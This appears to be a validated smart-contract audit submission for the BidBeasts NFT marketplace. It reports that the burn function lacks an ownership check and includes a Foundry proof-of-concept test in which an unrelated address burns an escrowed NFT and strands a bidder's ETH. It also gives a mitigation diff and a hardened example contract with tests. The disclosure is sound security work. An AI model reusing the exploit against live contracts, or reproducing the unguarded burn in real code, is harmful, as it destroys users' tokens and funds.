Bid Beasts

First Flight #49
Beginner Friendly, Foundry, Solidity, NFT
100 EXP
Submission Details
Severity: high
Valid

Missing authorization check for burn NFT

The burn function in BidBeasts.sol has no authorization check, so any address can burn any token. Because the marketplace moves NFTs between users and the protocol when listing, unlisting and settling an auction, this lets a third party destroy a token at any point in that flow, and users lose their NFTs.

Description

  • In the marketplace, every time a user lists, unlists or settles an auction, the NFT is transferred between the user and the protocol (or from the protocol back to a user).

  • BidBeasts.sol has a burn function that lets a user burn their NFT. It should be restricted to the owner of the token, but as written it allows anyone to burn any NFT:

    @> function burn(uint256 _tokenId) public {
           _burn(_tokenId);
           emit BidBeastsBurn(msg.sender, _tokenId);
       }

Risk

Likelihood:

  • Before a seller lists an NFT, an attacker can burn it.

  • While the NFT is held by the marketplace (between listing and unlisting or settling the auction), an attacker can burn it out of the market itself.

Impact:

  • High impact on the user who owns the NFT

  • High impact on the bidder who would buy the NFT

  • High impact on the protocol itself.

Proof of Concept

The following PoC covers only the settle-auction case; it can be adapted to demonstrate the other impacts.

    // Foundry test; nft, market and OWNER come from the project's test harness (setUp).
    // Renamed from test_anyoneCanmintNft: the test shows that anyone can burn, not mint.
    function test_anyoneCanBurnNft() public {
        address user = makeAddr("user");
        address user2 = makeAddr("User2");
        vm.deal(user2, 1 ether);

        // Protocol owner mints a token to the seller
        vm.prank(OWNER);
        uint256 tokenId = nft.mint(user);
        assertEq(nft.ownerOf(tokenId), user);

        // Seller lists the token; the marketplace takes custody of it
        vm.startPrank(user);
        nft.approve(address(market), tokenId);
        market.listNFT(tokenId, 0.01 ether, 1 ether);
        vm.stopPrank();
        assertEq(market.getListing(tokenId).seller, user);
        assertEq(nft.ownerOf(tokenId), address(market));

        // A bidder places the highest bid
        vm.startPrank(user2);
        market.placeBid{value: 0.06 ether}(tokenId);
        vm.stopPrank();
        assertEq(market.getHighestBid(tokenId).bidder, user2);

        // Auction ends; an unrelated address burns the escrowed token
        vm.warp(block.timestamp + 16 minutes);
        address hacker = makeAddr("hacker");
        vm.prank(hacker);
        nft.burn(tokenId);

        // Settlement now reverts because the token no longer exists...
        vm.startPrank(user2);
        vm.expectRevert();
        market.settleAuction(tokenId);
        vm.stopPrank();

        // ...and the bidder's ETH stays stuck in the marketplace
        assertEq(address(market).balance, 0.06 ether);
    }

Recommended Mitigation

Restrict burn so that only the owner of the NFT can call it, instead of anyone. That keeps the protocol safe and prevents an attacker from burning NFTs they do not own.

      function burn(uint256 _tokenId) public {
    +     require(msg.sender == ownerOf(_tokenId), "Not owner");
          _burn(_tokenId);
          emit BidBeastsBurn(msg.sender, _tokenId);
      }

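The following is an added example, not code from the BidBeasts project, showing the hardened burn in a minimal ERC721 together with a Foundry test that checks it. It assumes OpenZeppelin Contracts v5 and forge-std are installed; the contract name SafeBeasts, the error NotTokenOwner and the addresses used in the test are all made up for the example. It goes one step beyond the mitigation above by also accepting an address the owner has approved, which matches the ERC721 authorization model; the second test shows that an escrowed token cannot be burned by its former holder either, because the marketplace is the owner while the token is listed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the BidBeasts project code. Assumes OpenZeppelin Contracts v5
// and forge-std are installed in the Foundry project.
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
import {Test} from "forge-std/Test.sol";

/// Minimal ERC721 with a hardened burn: only the current owner, or an address
/// the owner has approved, may burn a token.
contract SafeBeasts is ERC721, Ownable {
    uint256 private _nextId;

    event Burned(address indexed by, uint256 indexed tokenId);

    error NotTokenOwner(address caller, uint256 tokenId);

    constructor() ERC721("SafeBeasts", "SBST") Ownable(msg.sender) {}

    function mint(address to) external onlyOwner returns (uint256 id) {
        id = _nextId++;
        _safeMint(to, id);
    }

    function burn(uint256 tokenId) external {
        // ownerOf reverts for a token that was never minted or is already burned,
        // so such ids cannot pass this check. An escrowed token is owned by the
        // marketplace, so the original seller cannot burn it mid-auction either.
        address owner = ownerOf(tokenId);
        bool authorized = msg.sender == owner
            || isApprovedForAll(owner, msg.sender)
            || getApproved(tokenId) == msg.sender;
        if (!authorized) revert NotTokenOwner(msg.sender, tokenId);
        _burn(tokenId);
        emit Burned(msg.sender, tokenId);
    }
}

contract SafeBeastsTest is Test {
    SafeBeasts nft;
    address deployer = makeAddr("deployer");
    address holder = makeAddr("holder");
    address escrow = makeAddr("escrow");     // stands in for the marketplace contract
    address attacker = makeAddr("attacker");

    function setUp() public {
        vm.prank(deployer);
        nft = new SafeBeasts();
    }

    function test_strangerCannotBurn() public {
        vm.prank(deployer);
        uint256 id = nft.mint(holder);

        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(SafeBeasts.NotTokenOwner.selector, attacker, id));
        nft.burn(id);

        assertEq(nft.ownerOf(id), holder);   // token survives the attempt
    }

    function test_formerHolderCannotBurnWhileEscrowed() public {
        vm.prank(deployer);
        uint256 id = nft.mint(holder);

        // Holder moves the token into escrow, as a listing would.
        vm.prank(holder);
        nft.transferFrom(holder, escrow, id);

        // The former holder is no longer the owner, so the burn is refused.
        vm.prank(holder);
        vm.expectRevert(abi.encodeWithSelector(SafeBeasts.NotTokenOwner.selector, holder, id));
        nft.burn(id);

        assertEq(nft.ownerOf(id), escrow);
    }

    function test_ownerCanBurn() public {
        vm.prank(deployer);
        uint256 id = nft.mint(holder);

        vm.prank(holder);
        nft.burn(id);

        assertEq(nft.balanceOf(holder), 0);   // token is gone
    }
}
```

Run it with `forge test --match-contract SafeBeastsTest`. If the project wants burn to be strictly owner-only, drop the two approval clauses from `authorized`; the `require(msg.sender == ownerOf(_tokenId))` form in the mitigation above is then equivalent. Either way, the check relies on `ownerOf` reverting for non-existent tokens, so a double burn is rejected before `_burn` runs.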
Updates

Lead Judging Commences

cryptoghost Lead Judge 2 months ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.
